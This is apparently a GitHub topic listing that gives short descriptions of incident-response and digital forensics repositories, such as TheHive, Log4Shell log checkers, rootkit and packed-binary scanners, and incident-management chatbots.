There are 12 repositories under incident-response-tooling topic.
A curated list of tools for incident response
TheHive: a Scalable, Open Source and Free Security Incident Response Platform
Incident Response Documentation made easy. Developed by Incident Responders for Incident Responders
AWS CloudSaga - Simulate security events in AWS
AHA is an incident management & communication framework to provide real-time alert customers when there are active AWS event(s). For customers with AWS Organizations, customers can get aggregated active account level events of all the accounts in the Organization. Customers not using AWS Organizations still benefit alerting at the account level.
RdpCacheStitcher is a tool that supports forensic analysts in reconstructing useful images out of RDP cache bitmaps.
A curated list of tools for incident response. With repository stars⭐ and forks🍴
Entropy scanner for Linux to detect packed or encrypted binaries related to malware. Finds malicious files and Linux processes and gives output with cryptographic hashes.
Forensic toolkit for iOS sysdiagnose feature
CLI program for automating the setup, configuration, and use of cybersecurity solutions
A collection of awesome tools, software, libraries, learning tutorials & videos, frameworks, best practices and technical resources about Incident Response & Management in Cybersecurity
Volatility MindMap & Cheat Sheet
Decloak Linux stealth rootkits hiding data with this simple memory mapped IO investigation tool.
Live system forensic collector
Scripts to for ready-to-use Velociraptor instance deployment in Azure
CLI for selecting and back-testing CloudWatch alarm configuration
A Slack app used for incident management at Department for Education Digital
Cortex-Analyzers Modified - SecTeam/CERT/SOC Security orchestration tools on steroids
Incident management chatbot for DevOps
Go client library for accessing the Incident.io API
A curated list of tools for incident response
Get to the root cause of an issue, learn from it, and make sure it doesn’t happen again.
Tool to try to retrieve the java class used as dropper for the RCE in the context of log4shell vulnerability.
Powershell script to check log files for Log4Shell exploitation
This is the workbench for designing and updating the "security-playbook" object template for the MISP project - https://github.com/MISP/misp-objects/blob/main/objects/security-playbook/definition.json
systeminfo command for offline system images
Debug a sample in Windows using also API Monitor.
Introduction to SOC and related terminologies.
Check domain in question to VT